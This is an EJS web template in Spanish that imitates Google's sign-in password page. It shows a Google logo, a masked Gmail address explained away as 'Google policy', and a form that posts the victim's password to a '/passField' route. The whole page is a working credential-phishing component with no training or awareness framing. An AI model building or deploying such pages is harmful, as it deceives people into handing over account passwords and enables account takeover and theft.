<%-include('includes/head.ejs')%>
<link rel="shortcut icon" href="/img/logo.jpg">
<body>
    <div class="container-fluid">
        <div class="row" style="padding-top: 2cm;">
            <div class="col-lg-4 col-md-2 col-sm-0"></div>
            <div class="col-lg-4 col-md-8 col-sm-12">
                <form action="/passField" method="post">
                <div class="card" style="width: 100%;">
                    <div class="card-body text-center">
                        <img class="mt-4" src="/img/googlename.png" style="width: 75px; height: 24px;">
                      <h4 class="card-title mt-3">Te damos la bienvenida</h4>
                      <div class="container" style="padding-left: 25%; padding-right: 25%;">
                        <div class="input-group mb-2">
                            <label class="input-group-text" for="inputGroupSelect01" style="background-color: white;"><small><i class="fa-solid fa-circle-user"></i></small></label>
                            <select class="form-select" id="inputGroupSelect01">
                              <option selected>**********@gmail.com</option>                              
                            </select>
                            <label for=""><small>Ocultamos tu usuario por politicas de Google</small></label>
                          </div>
                    </div>                
                      
                      <div class="container" style="padding-left: 5%; padding-right: 5%;">
                        <div class="form-floating mt-4">
                        <input type="password" class="form-control" id="pass" placeholder="Ingresa tu contraseña" name="password" required>
                        <label for="floatingInput" class="text-muted">Ingresa tu contraseña</label>
                        </div>
                      </div>
                    </div>
                    
                        <div class="container" style="padding-left: 10%; padding-right: 10%;">
                            <input type="checkbox" name="" id="showPass"> Mostrar contraseña
                        </div>                        
                    
                    <div class="card-body">
                        <div class="container" style="padding-left: 0.5cm; padding-right: 0.5cm;">                            
                            <div class="row py-5">
                                <div class="col-4">
                                    <a href="#" class="btn btn-light" style="color: #1a73e8;"><small>¿Olvidaste la contraseña?</small></a>
                                </div>
                                <div class="col-4"></div>
                                <div class="col-4" style="padding-left: 1cm;">
                                    <button type="submit" class="btn btn-primary"><small>Siguiente</small></button>
                                </div>
                            </div>
                        </div>                        
                    </div>
                  </div>
                  </form>
                  <div class="container-fluid">
                    <div class="row pt-3">
                        <div class="col-2">
                            <div class="input-group mb-3" style="font-size: 14px;">                                
                                <button class="btn btn-outline-secondary dropdown-toggle border border-0" type="button" data-bs-toggle="dropdown" aria-expanded="false"><small>Español (México)</small></button>
                                <ul class="dropdown-menu dropdown-menu-end">
                                  <li><a class="dropdown-item" href="#">Action</a></li>
                                  <li><a class="dropdown-item" href="#">Another action</a></li>
                                  <li><a class="dropdown-item" href="#">Something else here</a></li>
                                  <li><hr class="dropdown-divider"></li>
                                  <li><a class="dropdown-item" href="#">Separated link</a></li>
                                </ul>
                              </div>
                        </div>
                        <div class="col-2"></div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Ayuda</small></button>
                        </div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Privacidad</small></button>
                        </div>
                        <div class="col-2">
                            
                        </div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Términos</small></button>
                        </div>
                    </div>
                  </div>                    
            </div>
            <div class="col-lg-4 col-md-2 col-sm-0"></div>
        </div>
    </div>
</body>
<%-include('includes/scripts.ejs')%> 